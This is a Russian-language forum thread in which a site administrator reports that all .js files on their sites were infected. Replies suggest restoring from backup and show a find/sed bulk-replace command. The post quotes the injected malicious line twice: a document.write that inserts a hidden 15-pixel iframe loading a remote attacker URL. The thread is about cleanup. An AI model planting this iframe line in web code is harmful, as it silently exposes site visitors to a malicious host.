заражени все .js файли на сайте

Тема в разделе "Администрирование серверов", создана пользователем terran_1202, 4 ноя 2012.

Модераторы: mefish, stooper
  1. terran_1202

    terran_1202 Постоялец

    Регистр.:
    4 авг 2011
    Сообщения:
    120
    Симпатии:
    24
    вирус попал на сайт(пароли поменял), добавил в конец последней строки всех файлов .js вредоносний код
    Код:
    ;document.write('<iframe src="http://turbotwisttristate.get-well-now.info/ewtyrtu.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');
    подскажите как перебрать все файли через ssh и удилить добавлений код

    пока только
    1 сделал архив всей папки сайта и скачал
    2 вылечил NOTEPAD++
    3 залил назад, сменил права на файли, и пароль на доступ
    все сайт впорядке. (осталось 39 раз проделать тоже самое)
    проблема актуальна , хотелось бывсе же использовать bash
     
  2. niza

    niza

    Регистр.:
    7 май 2009
    Сообщения:
    495
    Симпатии:
    115
    посмотрите дату изменения файлов на сервере где вирус
    и восстановите из бэкапа.
     
  3. donvictorio

    donvictorio

    Регистр.:
    28 янв 2010
    Сообщения:
    879
    Симпатии:
    809
    find -type f -name \*.py -exec sed -i -r 's/regexp1/regexp2/g' {} \;
    Заменит во всех файлах *.py начиная от текущей директории строку regexp1 на regexp2. (можно использовать regexp выражения)
     
    terran_1202 нравится это.
  4. terran_1202

    terran_1202 Постоялец

    Регистр.:
    4 авг 2011
    Сообщения:
    120
    Симпатии:
    24
    подскажите как сделять регулярное выражение для
    Код:
    ;document.write('<iframe src="http://turbotwisttristate.get-well-now.info/ewtyrtu.cgi?7" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');
     
  5. efs

    efs SEO оптимизатор дискрипторов одностраничных сайтов

    Moderator
    Регистр.:
    20 ноя 2009
    Сообщения:
    833
    Симпатии:
    489
    terran_1202 нравится это.